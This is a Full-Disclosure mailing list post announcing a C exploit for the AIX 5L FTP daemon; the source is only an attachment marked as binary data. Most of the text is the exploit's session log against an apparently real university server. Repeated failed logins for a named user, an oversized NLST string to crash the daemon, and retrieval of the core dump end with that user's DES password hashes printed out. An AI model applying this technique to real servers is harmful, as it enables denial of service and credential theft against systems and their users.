Attached is another version of my AIX 5l FTPd exploit written in C to be more portable & powerful between hosts :> The Exploit in action: [root@vs2067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c jkateley < 220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. populating DES hash in memory... > USER jkateley < 331 Password required for jkateley. > PASS abcdef < 530 Login incorrect. > USER jkateley < 331 Password required for jkateley. > PASS abcdef < 530 Login incorrect. > USER jkateley < 331 Password required for jkateley. > PASS abcdef < 530 Login incorrect. logging in... > USER ftp < 331 Guest login ok, send ident as password. > PASS guest < 230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh from docsis1-137 230-Last login: Thu Jul 22 21:12:23 MDT 2010 on ftp from vs2067037.vserver.de < 230 Guest login ok, access restrictions apply. changing directory... > CWD pub < 250 CWD command successful. triggering segmentation violation... > NLST ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA trigger succeeded! < 220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready. logging in 2nd time... > USER ftp < 331 Guest login ok, send ident as password. > PASS guest < 230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh from docsis1-137 230-Last login: Thu Jul 22 21:12:33 MDT 2010 on ftp from vs2067037.vserver.de < 230 Guest login ok, access restrictions apply. changing directory... > CWD pub < 250 CWD command successful. getting core file... > TYPE I < 200 Type set to I. > PORT 85,25,67,37,98,23 < 200 PORT command successful. > RETR core < 150 Opening data connection for core (3979727 bytes). finally extracting DES hashes from core file for user 'jkateley'... PbdsrHgkIuvp2 9aS4EOARuLSqA PbdsrHgkIuvp2 logininterval loginreenable 9aS4EOARuLSqA logininterval loginreenable YIELDLOOPTIME YIELDLOOPTIME YIELDLOOPTIME YIELDLOOPTIME MALLOCBUCKETS PREREQUISITES logininterval loginreenable loginreenable logininterval done. [root@vs2067037 kcope]#
Attachment:
aix.c
Description: Binary data
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/